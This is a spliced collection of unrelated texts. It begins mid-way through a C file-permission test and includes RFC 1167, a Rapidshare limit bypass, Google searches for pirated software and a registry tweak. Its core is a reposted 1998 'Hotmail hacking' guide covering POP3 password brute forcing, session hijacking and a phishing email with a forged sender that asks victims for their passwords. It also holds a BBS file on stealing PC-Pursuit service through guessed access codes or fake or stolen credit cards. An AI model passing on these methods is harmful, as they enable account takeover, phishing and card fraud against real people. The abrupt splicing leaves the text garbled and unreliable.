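    if (mkdtemp(dir) == NULL)
        return -1;
    char path[64];
    snprintf(path, sizeof path, "%s/secret", dir);

    mode_t old = umask(0);
    int fd = create_private(path);
    umask(old);
    int result = 0;
    struct stat st;
    if (fd < 0)
        result = -2;
    else if (fstat(fd, &st) != 0 || (st.st_mode & 0777) != 0600)
        result = -3;                       /* must be 0600 even with umask 0 */
    else if (create_private(path) != -1 || errno != EEXIST)
        result = -4;                       /* a second create must refuse */
    if (fd >= 0) close(fd);
    unlink(path);
    rmdir(dir);
    return result;
}
```

The measured values (0666 under umask 0, 0644 under 022, 0600 under 077) are the point: a program that calls fopen() and never sets its own umask inherits whatever the boot script or the invoking user left behind, which is why item 31 singles out at(1)-style code.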

A Small Guide to Hacking HOTMAIL

From hacker@mitchell.demon.nl Mon Mar 02 20:09:04 1998
Newsgroups: alt.hacking
Subject: Hotmail Hack info !
From: Terry Mitchell
Date: Mon, 02 Mar 1998 12:09:04 -0800

HOTMAIL HACKING INFO.


I_1_I - Brute force hacking
a. Use telnet to connect to port 110 (Hotmail´s pop-server)
b. Type USER and then the victim´s username
c. Type PASS and then the guess a password
d. Repeat that until U have found the correct password.
!. This is called brute force hacking and requires patience.
It´s better than trying to guess the victims password on
hotmail homepage only because it´s faster.
____
I_2_I - The Best way
a. Get the username of the victim (It usually stands in the adress-field
)
b. Then type " www.hotmail.com/cgi-bin/start/victimsusername "
c. U´re in!
!. This hack only work if U are on the same network or computer as the
victim and if he don´t log out.
____
I_3_I - The old way
a. Go to http://www.hotmail/proxy.html
b. Now type the victims username. (press login)
c. Look at the source code.
d. On the fifth row U should find "action=someadress"
e. Copy that adress and paste it into the adress-field
f. You are in...
!. As you can see it´s a long procedure and the victim have
plenty of time to log out.
____
I_4_I - Another...
a. Go to hotmail´s homepage
b. Copy the source code.
c. Make a new html file with the same code but change method=post to
method=enter
d. "view" the page
e. Change the adress to www.hotmail.com/ (don´t press enter!)
f. Make the victim type in his username and password
g. Look in the adress-field. There you´ll see ...&password:something...
!. This is the way I use, because it lets you know the password.
(If he exits the browser U can see the password in the History folder!)

READ!
Hotmail´s sysops have changed the "system" so that the victim may log
out even
if U are inside his/her account. So don´t waste U´r time!

---

So you want to get some hotmail passwords?
This is pretty easy to do once you have got the hang of it.
If you are a beginner, I wouldn't make this your first attempt at
hacking. When you need to do is use a port surfer and surf over to
port 80. While there, you have to try and mail the user that you
want the password from. It is best to mail them using the words
"We" and "Here at Hotmail..." Most suckers fall for this and end
up giving out their password. There is another way to also, you can
get an anon mailer, and forge the addres as staff@hotmail.com. But
you have to change the reply address to go to a different addres
like user@host.com. The person that you are trying to get the pass
from MUST respond to that letter for the mail to be forwarded to you.
Have text like "Please reply to this letter with the subject "PASSWORD"
and underneith please include your user name and password.
If you have trouble Loging in withing the next few days, this is
only because we are updating our mail servers but no need to worry,
your mail will still be there. Even though the server may be down
for an hour. From the staff at Hotmail, Thank You."

Hacking PC-Pursuit Codes

OK, people... This is going to be all you need to know about
PC-Pursuit and how to use it to the fullest extent without
paying for it.

First let's look at what we need to know:

1. Functions of PC-Pursuit
2. How you can get your own PC-Pursuit account
3. How to use PC-Pursuit
4. City Codes for PC-Pursuit

Let's look at them one at a time, shall we?

*)> 1 - Functions of PC-Pursuit <(*

Basically, PC-Pursuit is a subsidiary of Telenet, which is a
subsidiary of U.S. Sprint (ugh!).
What PC-Pursuit is is a chain of modems that a registered
user can access to make long-distance calls for only $25 a
month.
Sounds great, doesn't it? Of course, but there ARE some
catches.
Namely that you can make ONLY calls via modem, no voice.
And that all calls must be made between 6pm (local time) and
7am, lest you get some hefty surcharges.

BUT, my friends, there is a way that you can use PC-Pursuit
for less than the flat $25 a month... Namely for FREE...
Which brings us to number 2...

*)> 2 - How you can get your own PC-Pursuit account <(*

Now, there are two ways to get around the fees. The easy way
(laden with risks), and the hard way (fewer risks).

Let's look at them one at a time.

The EASY way to hack an account on PC-Pursuit isn't even
hacking, really...
When you call the PC-Pursuit main bulletin board (more on
that later), you can sign up for PC-Pursuit. BUT you need a
major credit card...
Again, we have two choices for this.
We can either enter a bullshit credit card number with the
proper format and a phoney name, or a valid credit card
number that isn't your own...
Either way, you have to give them YOUR address, unless you
have a P.O. Box or a mailbox at a private company or another
location.
They will send you a packet in a week to 10 days, and then
you can just go nuts calling all the PC-Pursuitable
cities (25 at last count).

That is the easy way... I told you it was risky...

The HARD way is to actually hack out someone's code on a
Telenet system (a complete national listing of all local
Telenet access numbers is available on this board).


When you log on to Telenet, you see NOTHING. Press ENTER
twice. Simple, eh?
Next you see the first prompt from Telenet, 'TERMINAL='

Press Enter or type VT100, VT52, Dx (x = 0 to 9) or
whatever... I have not noticed any differences between any of
them as of yet...

Next you get the main Telenet prompt, the '@' symbol.

From here, a PC-Pursuit user would type this:

C D/SSCCC/BB,PCP12345,ABCD1234

C is for Connect. With This command, you can also log on to
many of the major computer services such as Delphi,
QuantumLink, and CompuServe.

The D is for Dial. Simple.
The slash divides commands and parameters on Telenet.
The SSCCC is SS = a two-letter state code and CCC = a
three-letter city code (more on these later).

The BB is either 3, 12 or 24, depending on the baud rates
available for the particular PC-Pursuit accessible area code,
and the baud rate you want (24, in most cases).

Now the good stuff... The access codes and password.

The Access codes are ALWAYS in the format of PCPxxxxx.
Always.

The PASSWORDS are varied. They are initially registered to
the user in the format of XXXXyyyy where XXXX are four
letters and yyyy are four digits...
NOW, your saving grace from people changing their passwords
is that Telenet charges $5.00 for each password change...
So this helps...

Other commands available on Telenet are D (when not preceded
by a C) for Disconnect and HANGUP, which does just that.

Now that you have gotten your very own PC-Pursuit account,
you need to know how to use the damn thing.

*)> 3 - How to use PC-Pursuit <(*

Sure, you can issue the command from Telenet to dial the city
and baud that you want, but after it gives you the CONNECTED
message, you are as lost as a blind lesbian in a fish market.

No problem... From here on in, it's all peaches and cream.
The modems use the Hayes AT command set...

To dial your number all you do is type in this:

ATDTxxxxxxx CR

xxxxxxx = the phone number of the board you want to call.

Easy, eh? And your other major AT commands are available:

ATZ Zaps the modem back to default settings
ATH Hangs up the modem
A/ Repeats the last command given
ATDP Dials pulse (WHY?!?)
And so on.

When you want to connect to another city, Type '@' from the
modem command mode, and then 'D ' at the Telenet main
prompt. Easy as pie.

So, now you are all set and take advantage of the generous
service that another stupid multi-billion dollar corporation
has bestowed upon us, the hackers of America.

Telenet also has a couple of nifty goodies that are available
to the users of PC-Pursuit, and the general public. These
are both modem lines.

PC-Pursuit Registration & Information
1-800-835-3638 or 703-689-5700
On this BBS you can actually register for PC-Pursuit, and
find out a little about the system. It has no features, and
is pretty boring. It might be fun to crash, though.

PC-Pursuit Net Exchange BBS
At the Telenet '@' prompt, type: PC PURSUIT,YOURID,PASSWORD
or call 703-689-3561.
This BBS has new info for PC-Pursuit users (be they legal or
not). It is advisable to keep a low profile on there, as they
have had a few hackers just go nuts and bring themselves into
the spotlight. Which is good, because the heat is on them,
not the smart ones that keep a low profile and are quiet.

If for some reason there is a problem with your billing (hee
hee hee) the Telenet network has their Customer Service &
Billing numbers:
1-800-336-0437 or 703-689-6400


*)>--------------------------------------------<(*
4 - Telenet City Codes
*)>--------------------------------------------<(*

PC-Pursuit
PC-Pursuit City, ST | Area Code | Code | Bauds Available (x100)
--------------------+-----------+------------+------------------------
Atlanta, GA | 404 | D/GAATL | 3/12/24
Boston, MA | 617 | D/MABOS | 3/12/24
Chicago, IL | 312 | D/ILCHI | 3/12/24
Chicago, IL * | 815 | D/ILCHI | 3/12/24
Cleveland, OH | 216 | D/OHCLV | 3/12
Dallas, TX | 214 | D/TXDAL | 3/12/24
Dallas, TX | 817 | D/TXDAL | 3/12/24
Denver, CO | 303 | D/CODEN | 3/12/24
Detroit, MI | 313 | D/MIDET | 3/12/24
Glendale, CA | 818 | D/CAGLE | 12
Hartford, CT | 203 | D/CTHAR | 12
Houston, TX | 713 | D/TXHOU | 3/12/24
Los Angeles, CA | 213 | D/CALAN | 3/12/24
Miami, FL | 305 | D/FLMIA | 3/12
Milwaukee, WI | 414 | D/WIMIL | 12
Minneapolis, MN | 612 | D/MNMIN | 3/12/24
Newark, NJ | 201 | D/NJNEW | 3/12/24
New York, NY | 212 | D/NYNYO | 3/12/24
New York, NY * | 718 | D/NYNYO | 3/12/24
Philadelphia, PA | 215 | D/PAPHI | 3/12/24
Phoenix, AZ | 602 | D/AZPHO | 3/12/24
Portland, OR | 503 | D/ORPOR | 3/12
Triangle Park, NC | 919 | D/NCRTP | 3/12/24
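The security lesson in the file above is the credential format itself: a fixed PCPxxxxx access code and an initial XXXXyyyy password give an attacker a search space of 26^4 x 10^4, about 32 bits, and the $5 change fee meant most users never rotated them. The following is an added example, not code from the original file: a parser that validates a Telenet connect command against the city table and the credential formats described above, plus the keyspace arithmetic. The city table is transcribed from the page; the regular expressions and function names are my own assumptions.

```python
"""Parse and validate a Telenet PC-Pursuit connect command of the form
    C D/SSCCC/BB,PCPxxxxx,XXXXyyyy
against the city table above.  Added example, not part of the original
file; the city table is copied from the page, everything else is an
assumption made for illustration."""
import math
import re
from collections import namedtuple

# City code -> baud rates (x100) available, transcribed from the table above.
CITY_BAUDS = {
    "GAATL": {3, 12, 24}, "MABOS": {3, 12, 24}, "ILCHI": {3, 12, 24},
    "OHCLV": {3, 12},     "TXDAL": {3, 12, 24}, "CODEN": {3, 12, 24},
    "MIDET": {3, 12, 24}, "CAGLE": {12},        "CTHAR": {12},
    "TXHOU": {3, 12, 24}, "CALAN": {3, 12, 24}, "FLMIA": {3, 12},
    "WIMIL": {12},        "MNMIN": {3, 12, 24}, "NJNEW": {3, 12, 24},
    "NYNYO": {3, 12, 24}, "PAPHI": {3, 12, 24}, "AZPHO": {3, 12, 24},
    "ORPOR": {3, 12},     "NCRTP": {3, 12, 24},
}

# Access code: PCP + five digits.  Initial password: four letters + four digits.
ACCESS_RE = re.compile(r"^PCP\d{5}$")
PASSWORD_RE = re.compile(r"^[A-Z]{4}\d{4}$")
CONNECT_RE = re.compile(r"^C\s+D/([A-Z]{5})/(\d{1,2}),([^,]+),([^,]+)$")

Connect = namedtuple("Connect", "city baud access password")

def parse_connect(cmd):
    """Return a Connect tuple, or raise ValueError naming the first problem found."""
    m = CONNECT_RE.match(cmd.strip().upper())
    if not m:
        raise ValueError("not a 'C D/SSCCC/BB,id,password' command")
    city, baud, access, password = m.group(1), int(m.group(2)), m.group(3), m.group(4)
    if city not in CITY_BAUDS:
        raise ValueError(f"unknown city code {city}")
    if baud not in CITY_BAUDS[city]:
        raise ValueError(f"{city} does not offer {baud}00 baud")
    if not ACCESS_RE.match(access):
        raise ValueError("access code must be PCP followed by five digits")
    if not PASSWORD_RE.match(password):
        raise ValueError("initial passwords are four letters followed by four digits")
    return Connect(city, baud, access, password)

def initial_password_space():
    """Size of the search space for an unchanged XXXXyyyy password, and its bit strength."""
    size = 26 ** 4 * 10 ** 4
    return size, math.log2(size)

if __name__ == "__main__":
    print(parse_connect("C D/MABOS/24,PCP12345,ABCD1234"))
    print("initial password space: %d (%.1f bits)" % initial_password_space())
```

Note that the parser upper-cases the whole command before matching, as Telenet was case-insensitive for these fields; a structured-format password like this one is exactly what a rate limit per access code, or simply a free password change, would have protected.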
...............................................................................................
Downloaded From P-80 International Information Systems 304-744-2253

Thoughts on the National Research and Education Network

Network Working Group V. Cerf
Request for Comments: 1167 CNRI
July 1990


THOUGHTS ON THE NATIONAL RESEARCH AND EDUCATION NETWORK

Status of this Memo

The memo provides a brief outline of a National Research and
Education Network (NREN). This memo provides information for the
Internet community. It does not specify any standard. It is not a
statement of IAB policy or recommendations.

Distribution of this memo is unlimited.

ABSTRACT

This contribution seeks to outline and call attention to some of the
major factors which will influence the form and structure of a
National Research and Education Network (NREN). It is implicitly
assumed that the system will emerge from the existing Internet.

ACKNOWLEDGEMENTS

The author gratefully acknowledges support from the National Science
Foundation, The Defense Advanced Research Projects Agency, the
Department of Energy and the National Aeronautics and Space
Administration through cooperative agreement NCR-8820945. The author
also acknowledges helpful comments from colleagues Ira Richer, Barry
Leiner, Hans-Werner Braun and Robert Kahn. The opinions expressed in
this paper are the personal opinions of the author and do not
represent positions of the U.S. Government, the Corporation for
National Research Initiatives or of the Internet Activities Board.
In fact, the author isn't sure he agrees with everything in the
paper, either!

A WORD ON TERMINOLOGY

The expression "national research and education network" is taken to
mean "the U.S. National Research and Education Network" in the
material which follows. It is implicitly assumed that similar
initiatives may arise in other countries and that a kind of Global
Research and Education Network may arise out of the existing
international Internet system. However, the primary focus of this
paper is on developments in the U.S.



Cerf [Page 1]
RFC 1167 NREN July 1990


FUNDAMENTALS

1. The NREN in the U.S. will evolve from the existing Internet base.
By implication, the U.S. NREN will have to fit into an international
environment consisting of a good many networks sponsored or owned and
operated by non-U.S. organizations around the world.

2. There will continue to be special-purpose and mission-oriented
networks sponsored by the U.S. Government which will need to link
with, if not directly support, the NREN.

3. The basic technical networking architecture of the system will
include local area networks, metropolitan, regional and wide-area
networks. Some nets will be organized to support transit traffic and
others will be strictly parasitic.

4. Looking towards the end of the decade, some of the networks may be
mobile (digital, cellular). A variety of technologies may be used,
including, but not limited to, high speed Fiber Data Distribution
Interface (FDDI) nets, Distributed-Queue Dual Bus (DQDB) nets,
Broadband Integrated Services Digital Networks (B-ISDN) utilizing
Asynchronous Transfer Mode (ATM) switching fabrics as well as
conventional Token Ring, Ethernet and other IEEE 802.X technology.
Narrowband ISDN and X.25 packet switching technology network services
are also likely to play a role along with Switched Multi-megabit Data
Service (SMDS) provided by telecommunications carriers. It also
would be fair to ask what role FTS-2000 might play in the system, at
least in support of government access to the NREN, and possibly in
support of national agency network facilities.

5. The protocol architecture of the system will continue to exhibit a
layered structure although the layering may vary from the present-day
Internet and planned Open Systems Interconnection structures in some
respects.

6. The system will include servers of varying kinds required to
support the general operation of the system (for example, network
management facilities, name servers of various types, email, database
and other kinds of information servers, multicast routers,
cryptographic certificate servers) and collaboration support tools
including video/teleconferencing systems and other "groupware"
facilities. Accounting and access control mechanisms will be
required.

7. The system will support multiple protocols on an end to end basis.
At the least, full TCP/IP and OSI protocol stacks will be supported.
Dealing with Connectionless and Connection-Oriented Network Services
in the OSI area is an open issue (transport service bridges and
application level gateways are two possibilities).

8. Provision must be made for experimental research in networking to
support the continued technical evolution of the system. The NREN
can no more be a static, rigid system than the Internet has been
since its inception. Interconnection of experimental facilities with
the operational NREN must be supported.

9. The architecture must accommodate the use of commercial services,
private and Government-sponsored networks in the NREN system.

Apart from the considerations listed above, it is also helpful to
consider the constituencies and stakeholders who have a role to play
in the use of, provision of and evolution of NREN services. Their
interests will affect the architecture of the NREN and the course of
its creation and evolution.

NREN CONSTITUENTS

The Users

Extrapolating from the present Internet, the users of the system
will be diverse. By legislative intent, it will include colleges
and universities, government research organizations (e.g.,
research laboratories of the Departments of Defense, Energy,
Health and Human Services, National Aeronautics and Space
Administration), non-profit and for-profit research and
development organizations, federally funded research and
development centers (FFRDCs), R&D activities of private
enterprise, library facilities of all kinds, and primary and
secondary schools. The system is not intended to be discipline-
specific.

It is critical to recognize that even in the present Internet, it
has been possible to accommodate a remarkable amalgam of private
enterprise, academic institutions, government and military
facilities. Indeed, the very ability to accept such a diverse
constituency turns on the increasing freedom of the so-called
intermediate-level networks to accept an unrestricted set of
users. The growth in the size and diversity of Internet users, if
it can be said to have been constrained at all, has been limited
in part by usage constraints placed on the federally-sponsored
national agency networks (e.g., NSFNET, NASA Science Internet,
Energy Sciences Net, High Energy Physics Net, the recently
deceased ARPANET, Defense Research Internet, etc.). Given the
purposes of these networks and the fiduciary responsibilities of
the agencies that have created them, such usage constraints seem
highly appropriate. It may be beneficial to search for less
constraining architectural paradigms, perhaps through the use of
backbone facilities which are not federally-sponsored.

The Internet does not quite serve the public in the same sense
that the telephone network(s) do (i.e., the Internet is not a
common carrier), although the linkages between the Internet and
public electronic mail systems, private bulletin board systems
such as FIDONET and commercial network services such as UUNET,
ALTERNET and PSI, for example, make the system extremely
accessible to a very wide variety of users.

It will be important to keep in mind that, over time, an
increasing number of institutional users will support local area
networks and will want to gain access to NREN by that means.
Individual use will continue to rely on dial-up access and, as it
is deployed, narrow-band ISDN. Eventually, metropolitan area
networks and broadband ISDN facilities may be used to support
access to NREN. Cellular radio or other mobile communication
technologies may also become increasingly popular as access tools.

The Service Providers

In its earliest stages, the Internet consisted solely of
government-sponsored networks such as the Defense Department's
ARPANET, Packet Radio Networks and Packet Satellite Networks.
With the introduction of Xerox PARC's Ethernet, however, things
began to change and privately owned and operated networks became
an integral part of the Internet architecture.

For a time, there was a mixture of government-sponsored backbone
facilities and private local area networks. With the introduction
of the National Science Foundation NSFNET, however, the
architecture changed again to include intermediate-level networks
consisting of collections of commercially-produced routers and
trunk or access lines which connected local area network
facilities to the government-sponsored backbones. The
government-sponsored supercomputer centers (such as the National
Aerospace Simulator at NASA/AMES, the Magnetic Fusion Energy
Computing Center at Lawrence Livermore Laboratory and the half-
dozen or so NSF-sponsored supercomputer centers) fostered the
growth of communications networks specifically to support
supercomputer access although, over time, these have tended to
look more and more like general-purpose intermediate-level
networks.

Many, but not all, of the intermediate-level networks applied for
and received seed funding from the National Science Foundation.
It was and continues to be NSF's position, however, that such
direct subsidies should diminish over time and that the
intermediate networks should become self-sustaining. To
accomplish this objective, the intermediate-level networks have
been turning to an increasingly diverse user constituency (see
section above).

The basic model of government backbones, consortium intermediate
level nets and private local area networks has served reasonably
well during the 1980's but it would appear that newer
telecommunications technologies may suggest another potential
paradigm. As the NSFNET moves towards higher speed backbone
operation in the 45 Mb/s range, the importance of carrier
participation in the enterprise has increased. The provision of
backbone capacity at attractive rates by the inter-exchange
carrier (in this case, MCI Communications Corporation) has been
crucial to the feasibility of deploying such a high speed system.

As the third phase of the NREN effort gets underway, it is
becoming increasingly apparent that the "federally-funded
backbone" model may and perhaps even should or must give way to a
vision of commercially operated, gigabit speed systems to which
the users of the NREN have access. If there is federal subsidy in
the new paradigm, it might come through direct provision of
support for networking at the level of individual research grant
or possibly through a system of institutional vouchers permitting
and perhaps even mandating institution-wide network planning and
provision. This differs from the present model in which the
backbone networks are essentially federally owned and operated or
enjoy significant, direct federal support to the provider of the
service.

The importance of such a shift in service provision philosophy
cannot be over-emphasized. In the long run, it eliminates
unnecessary restrictions on the use and application of the
backbone facilities, opening up possibilities for true ubiquity of
access and use without the need for federal control, except to the
extent that any such services are considered in need of
regulation, perhaps. The same arguments might be made for the
intermediate level systems (metropolitan and regional area access
networks). This does NOT mean that private networks ranging from
local consortia to inter-continental systems will be ruled out.
The economics of private networking may still be favorable for
sufficiently heavy usage. It does suggest, however, that
achieving scale and ubiquity may largely rely on publicly
accessible facilities.

The Vendors

Apart from service provision, the technology available to the
users and the service providers will come largely from commercial
sources. A possible exception to this may be the switches used in
the gigabit testbed effort, but ultimately, even this technology
will have to be provided commercially if the system is to achieve
the scale necessary to serve as the backbone of the NREN.

An important consequence of this observation is that the NREN
architecture should be fashioned in such a way that it can be
constructed from technology compatible with carrier plans and
available from commercial telecommunications equipment suppliers.
Examples include the use of SONET (Synchronous Optical Network)
optical transmission technology, Switched Multimegabit Data
Services offerings (metropolitan area networks), Asynchronous
Transmission Mode (ATM) switches, frame relays, high speed,
multi-protocol routers, and so on. It is somewhat unclear what
role the public X.25 networks will play, especially where narrow
and broadband ISDN services are available, but it is also not
obvious that they ought to be written off at this point. Where
there is still research and development activity (such as in
network management), the network R&D community can contribute
through experimental efforts and through participation in
standards-making activities (e.g., ANSI, NIST, IAB/IETF, Open
NMF).

OPERATIONS

It seems clear that the current Internet and the anticipated NREN
will have to function in a highly distributed fashion. Given the
diversity of service providers and the richness of the constituent
networks (as to technology and ownership), there will have to be a
good deal of collaboration and cooperation to make the system work.
One can see the necessity for this, based on the existing voice
network in the U.S. with its local and inter-exchange carrier (IEC)
structure. It should be noted that in the presence of the local and
IEC structure, it has proven possible to support private and virtual
private networking as well. The same needs to be true of the NREN.

A critical element of any commercial service is accounting and
billing. It must be possible to identify users (billable parties,
anyway) and to compute usage charges. This is not to say that the
NREN component networks must necessarily bill on the basis of usage.
It may prove preferable to have fixed access charges which might be
modulated by access data rate, as some of the intermediate-level
networks have found. It would not be surprising to find a mixture of
charging policies in which usage charges are preferable for small
amounts of use and flat rate charges are preferred for high volume
use.

It will be critical to establish a forum in which operational matters
can be debated and methods established to allow cooperative operation
of the entire system. A number of possibilities present themselves:
use of the Internet Engineering Task Force as a basis, use of
existing telecommunication carrier organizations, or possibly a
consortium of all service providers (and private network operators?).
Even if such an activity is initiated through federal action, it may
be helpful, in the long run, if it eventually embraces a much wider
community.

Agreements are needed on the technical foundations for network
monitoring and management, for internetwork accounting and exchange
payments, for problem identification, tracking, escalation and
resolution. A framework is needed for the support of users of the
aggregate NREN. This suggests cooperative agreements among network
information centers, user service and support organizations to begin
with. Eventually, the cost of such operations will have to be
incorporated into the general cost of service provision. The federal
role, even if it acts as catalyst in the initial stages, may
ultimately focus on the direct support of the users of the system
which it finds it appropriate to support and subsidize (e.g., the
research and educational users of the NREN).

A voucher system has been proposed, in the case of the NREN, which
would permit users to choose which NREN service provider(s) to
engage. The vouchers might be redeemed by the service providers in
the same sort of way that food stamps are redeemed by supermarkets.
Over time, the cost of the vouchers could change so that an initial
high subsidy from the federal government would diminish until the
utility of the vouchers vanished and decisions would be made to
purchase telecommunications services on a pure cost/benefit basis.

IMPORTANCE OF COMMERCIAL INTERESTS

The initial technical architecture should incorporate commercial
service provision where possible so as to avoid the creation of a
system which is solely reliant on the federal government for its
support and operation. It is anticipated that a hybrid system will
develop but, for example, it is possible that the gigabit backbone
components of the system might be strictly commercial from the start,
even if the lower speed components of the NREN vary from private, to
public to federally subsidized or owned and operated.

CONCLUSIONS

The idea of creating a National Research and Education Network has
captured the attention and enthusiasm of an extraordinarily broad
collection of interested parties. I believe this is in part a
consequence of the remarkable range of new services and facilities
which could be provided once the network infrastructure is in place.
If the technology of the NREN is commercially viable, one can readily
imagine that an economic engine of considerable proportions might
result from the widespread accessibility of NREN-like facilities to
the business sector.

Security Considerations

Security issues are not discussed in this memo.

Author's Address

Vinton G. Cerf
Corporation for National Research Initiatives
1895 Preston White Drive, Suite 100
Reston, VA 22091

EMail: vcerf@NRI.Reston.VA.US

Phone: (703) 620-8990
------------------------------------------------------------------------------

Unlimited Rapidshare Downloads

It is very easy to fool the Rapidshare server if your IP address is dynamically assigned by your ISP, because its download limit is tracked per IP address (and by cookie). Just follow these simple steps:

Clean up the IE or Netscape cookies (in this case the one that belongs to the Rapidshare website).
On a command prompt, type each of these and press Enter:
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit

Or save these commands in a .bat file and run it every time you need to fool the Rapidshare server. Remember to clean up the Rapidshare cookie in your Temporary Internet Files folder. Note that ipconfig /release and /renew only give you a different address if your ISP's DHCP server hands out a new lease; many cable and DSL providers return the same address, in which case this does nothing.

Now you should be ready to download as many files as you want from their server.

And there is this cool link: paste it into the browser and see (it is a Google search for .rar, .zip, .pdf and .exe files hosted on rapidshare.de):
http://www.google.com/search?lr=&as_qdr=all&q=+.rar+OR+.zip+OR+.pdf+OR+.exe+site%3Arapidshare.de

Ultimate Google Way

Look for Appz in Parent Directory

intext:"parent directory" intext:"[EXE]"


intext:"parent directory" intitle:"index of" "[EXE]"


intext:"parent directory" intitle:"index of" "[RAR]"

This will look for any exe, or optionally for zip, rar, ace, iso, bin etc., in open directory listings. (Tags like [EXE], [VID] and [MP3] are typically the alt text of the file-type icons in an auto-generated listing such as Apache's mod_autoindex; "index of:" is not a Google operator, but the title of such a listing is "Index of /...", so intitle:"index of" is the form that works.)

Look for Moviez in Parent Directory

intext:"parent directory" intext:"[VID]"


intext:"parent directory" intitle:"index of" "[VID]"

This will look for any video filetype in a parent directory listing. You can optionally add intext:"xvid" or intext:"divx" for movies in a specific codec.

Look for Muzik in Parent Directory

intext:"parent directory" intext:"[MP3]"


intext:"parent directory" intitle:"index of" "[MP3]"

This will look for any music files.

Look for Gamez in Parent Directory

intext:"parent directory" intitle:"index of" "[Gamez]"
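The searches above (and the Rapidshare link earlier on this page) all rely on auto-generated directory listings that a web server exposes by mistake. The following is an added example, not code from the original post, with two helpers: dork_url() builds a Google search URL from query tokens the way the Rapidshare link does, and listing_entries() parses an index page so you can test your own hosts for an exposed listing before someone else finds it via Google. The HTML sample is constructed in the style of an Apache autoindex page; the function names are my own.

```python
"""Two helpers around the directory-listing searches above.  Added example,
not part of the original post.  dork_url() builds a Google query URL the way
the Rapidshare link above does; listing_entries() parses a directory index
page so you can check your own servers for exposed listings.  The HTML below
is a constructed sample in the style of an Apache mod_autoindex page."""
from html.parser import HTMLParser
from urllib.parse import urlencode

def dork_url(tokens, site=None):
    """Return a Google search URL for the given query tokens (assumed format)."""
    q = " ".join(tokens)
    if site:
        q += f" site:{site}"
    return "http://www.google.com/search?" + urlencode({"q": q})

SAMPLE_LISTING = """<html><head><title>Index of /pub/tools</title></head><body>
<h1>Index of /pub/tools</h1>
<pre><img src="/icons/back.gif" alt="[PARENTDIR]"> <a href="/pub/">Parent Directory</a>
<img src="/icons/binary.gif" alt="[EXE]"> <a href="setup.exe">setup.exe</a>
<img src="/icons/compressed.gif" alt="[RAR]"> <a href="dump.rar">dump.rar</a>
<img src="/icons/movie.gif" alt="[VID]"> <a href="demo.avi">demo.avi</a>
<img src="/icons/text.gif" alt="[TXT]"> <a href="README">README</a>
</pre></body></html>"""

class _Index(HTMLParser):
    """Collect (type tag, href) pairs from an autoindex-style page."""
    def __init__(self):
        super().__init__()
        self.title, self._in_title, self._tag = "", False, None
        self.entries = []
    def handle_starttag(self, name, attrs):
        a = dict(attrs)
        if name == "title":
            self._in_title = True
        elif name == "img" and a.get("alt", "").startswith("["):
            self._tag = a["alt"].strip("[]")        # "[EXE]" -> "EXE"
        elif name == "a" and self._tag is not None:
            self.entries.append((self._tag, a.get("href", "")))
            self._tag = None
    def handle_endtag(self, name):
        if name == "title":
            self._in_title = False
    def handle_data(self, data):
        if self._in_title:
            self.title += data

def listing_entries(html, types=None):
    """Return [(type, href)] for an exposed index page, or [] if it is not one.
    `types`, if given, restricts the result to those tags (e.g. {"EXE", "RAR"})."""
    p = _Index()
    p.feed(html)
    if not p.title.strip().lower().startswith("index of"):
        return []
    return [e for e in p.entries
            if e[0] != "PARENTDIR" and (types is None or e[0] in types)]

if __name__ == "__main__":
    print(dork_url(['intext:"parent directory"', 'intitle:"index of"', '"[EXE]"']))
    for kind, href in listing_entries(SAMPLE_LISTING):
        print(kind, href)
```

On the defensive side the fix is `Options -Indexes` (Apache) or `autoindex off` (nginx) on any directory that has no index file; running listing_entries() over a fetched copy of each directory URL you serve tells you which ones still need it.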

Speed Up Internet

1. Windows 2k/XP

1. First, open the Windows Registry using Regedit, and (after backing up) navigate to:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider
2. Note the following lines (all hex DWORDs):
Class = 008 (8) - indicates that TCP/IP is a name service provider, don't change
LocalPriority = 1f3 (499) - local names cache
HostsPriority = 1f4 (500) - the HOSTS file
DnsPriority = 7d0 (2000) - DNS
NetbtPriority = 7d1 (2001) - NetBT name resolution, including WINS
3. What we're aiming to do is increase the priority of the last four settings while keeping their order. The valid range is from -32768 to +32767, and lower numbers mean higher priority compared to other services. So we want lower numbers without going to extremes; something like what's shown below should work well:
4. Change the "Priority" lines to:
LocalPriority = 005 (5) - local names cache
HostsPriority = 006 (6) - the HOSTS file
DnsPriority = 007 (7) - DNS
NetbtPriority = 008 (8) - NetBT name resolution, including WINS
5. Reboot for changes to take effect
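The text says "after backing up" but does not show how, and the only rules it gives are the signed 16-bit range and "keep their order". The following is an added example, not code from the original post: it checks a proposed set of values against exactly those rules and, on Windows, exports the key with reg.exe before writing the DWORDs. The backup path and the assumption that the current values are the defaults listed above are mine.

```python
"""Plan (and, on Windows, apply) the ServiceProvider priority change above
with a registry backup first.  Added example, not part of the original post.
The range and ordering rules come from the text; the backup path and the
assumption that the current values are the defaults are mine."""
import subprocess
import sys

KEY = r"SYSTEM\CurrentControlSet\Services\Tcpip\ServiceProvider"
ORDER = ("LocalPriority", "HostsPriority", "DnsPriority", "NetbtPriority")
DEFAULTS = {"LocalPriority": 499, "HostsPriority": 500, "DnsPriority": 2000, "NetbtPriority": 2001}
TWEAK = {"LocalPriority": 5, "HostsPriority": 6, "DnsPriority": 7, "NetbtPriority": 8}

def plan_priorities(new, current=DEFAULTS):
    """Validate `new` against the rules in the text: every value is a signed
    16-bit number, no provider gets a lower priority than it has now, and the
    resolution order (cache, HOSTS, DNS, NetBT) is preserved.  Returns the
    {name: value} mapping to write, or raises ValueError."""
    for name in ORDER:
        if name not in new:
            raise ValueError(f"missing {name}")
        v = new[name]
        if not -32768 <= v <= 32767:
            raise ValueError(f"{name}={v} outside -32768..32767")
        if v > current[name]:
            raise ValueError(f"{name}={v} would lower its priority (was {current[name]})")
    values = [new[n] for n in ORDER]
    if values != sorted(values) or len(set(values)) != len(values):
        raise ValueError("new values do not keep the order cache < HOSTS < DNS < NetBT")
    return {n: new[n] for n in ORDER}

def apply_priorities(new, backup_path=r"C:\ServiceProvider-backup.reg"):
    """Windows only: export the key with reg.exe, then write the DWORDs."""
    if sys.platform != "win32":
        raise RuntimeError("registry writes only make sense on Windows")
    import winreg
    plan = plan_priorities(new)
    subprocess.run(["reg", "export", "HKLM\\" + KEY, backup_path, "/y"], check=True)
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY, 0, winreg.KEY_SET_VALUE) as k:
        for name, value in plan.items():
            winreg.SetValueEx(k, name, 0, winreg.REG_DWORD, value)
    return plan

if __name__ == "__main__":
    print(plan_priorities(TWEAK))
```

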